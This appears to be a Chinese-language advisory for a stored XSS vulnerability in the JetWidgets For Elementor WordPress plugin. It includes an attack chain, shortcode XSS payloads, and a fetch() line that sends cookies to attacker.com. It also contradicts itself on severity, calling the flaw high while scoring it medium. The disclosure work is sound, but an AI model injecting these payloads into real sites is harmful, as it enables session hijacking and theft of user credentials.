CVE-2025-8195 | JetWidgets For Elementor插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8195

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

JetWidgets For Elementor插件（WordPress）

漏洞概述

CVE-2025-8195是WordPress JetWidgets For Elementor插件中的一个高危安全漏洞。该漏洞为存储型跨站脚本攻击（Stored XSS），存在于插件的Image Comparison（图片对比）和Subscribe（订阅表单）小部件中。漏洞根源在于插件对用户输入的属性值缺乏充分的输入清理和输出转义处理。攻击者利用此漏洞可通过在页面中注入恶意JavaScript脚本，当其他用户访问包含恶意代码的页面时，脚本将在受害者浏览器中执行，从而窃取Cookie、会话令牌或其他敏感信息。由于该漏洞影响所有版本至1.0.20版本，且攻击门槛相对较低（只需贡献者级别权限），对使用该插件的WordPress网站构成中等程度的安全威胁。

技术细节

漏洞根源在于JetWidgets For Elementor插件的Jet_Widgets_Image_Comparison和Jet_Widgets_Subscribe_Form小部件对用户可控属性缺乏安全处理。具体来说：1) 输入清理不足：插件直接使用用户提供的属性值而未进行严格过滤；2) 输出转义缺失：在渲染HTML时未对用户输入进行适当的HTML实体编码。攻击者利用此漏洞需要具备WordPress网站的贡献者（Contributor）角色或更高权限，可在页面/文章中插入包含恶意脚本的JetWidgets短代码或使用小部件构建器。当管理员或访客访问包含恶意内容的页面时，浏览器会执行注入的JavaScript代码，可能导致会话劫持、凭据窃取或进一步的攻击。CVSS 3.1评分6.4（AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N）表明攻击复杂度低、无需用户交互但影响范围跨越多个资源。

攻击链分析

STEP 1

步骤1

攻击者获得WordPress网站的贡献者（Contributor）级别账户权限

STEP 2

步骤2

攻击者创建或编辑页面/文章，使用Elementor页面构建器添加JetWidgets Image Comparison或Subscribe Form小部件

STEP 3

步骤3

在widget属性字段中注入恶意JavaScript代码，如在图片URL、占位符文本或CSS类名中插入XSS payload

STEP 4

步骤4

保存并发布页面，由于插件未正确转义用户输入，恶意脚本被永久存储在数据库中

STEP 5

步骤5

当管理员、编辑或其他用户访问包含恶意内容的页面时，浏览器执行注入的JavaScript代码

STEP 6

步骤6

攻击者通过XSS成功窃取用户Cookie、会话令牌或其他敏感信息，可能进一步进行会话劫持或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-8195 PoC: Stored XSS via JetWidgets Image Comparison Widget -->
<!-- Requires Contributor-level access or higher -->

<!-- Method 1: Via Shortcode -->
[jet_image_comparison before_image='<img src=x onerror=alert(document.cookie)>' after_image='normal.jpg']

<!-- Method 2: Via Subscribe Form Widget -->
[jet_subscribe_form placeholder='<script>alert(String.fromCharCode(88,83,83))</script>']

<!-- Method 3: XSS payload in custom CSS class -->
[jet_image_comparison before_image='test.jpg' css_class='" onerror="alert(document.domain)" data-x="']

<!-- Exploitation via Elementor Page Builder: -->
<!-- 1. Navigate to Pages > Add New (or edit existing) -->
<!-- 2. Click 'Edit with Elementor' -->
<!-- 3. Add JetWidgets Image Comparison widget -->
<!-- 4. In widget settings, inject XSS payload in Image URL or Title fields -->
<!-- 5. Save and publish/preview -->
<!-- 6. Any user visiting the page will trigger the XSS -->

<!-- Example malicious payload: -->
<img src=x onerror=fetch('https://attacker.com/steal?cookie='+document.cookie)>

影响范围

JetWidgets For Elementor插件 <= 1.0.20

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用JetWidgets Image Comparison和Subscribe Form小部件；2) 限制除管理员外所有用户的页面发布权限；3) 使用Wordfence等安全插件启用登录验证码防止账户被盗用；4) 实施严格的Content Security Policy；5) 定期检查用户提交的内容是否存在恶意脚本。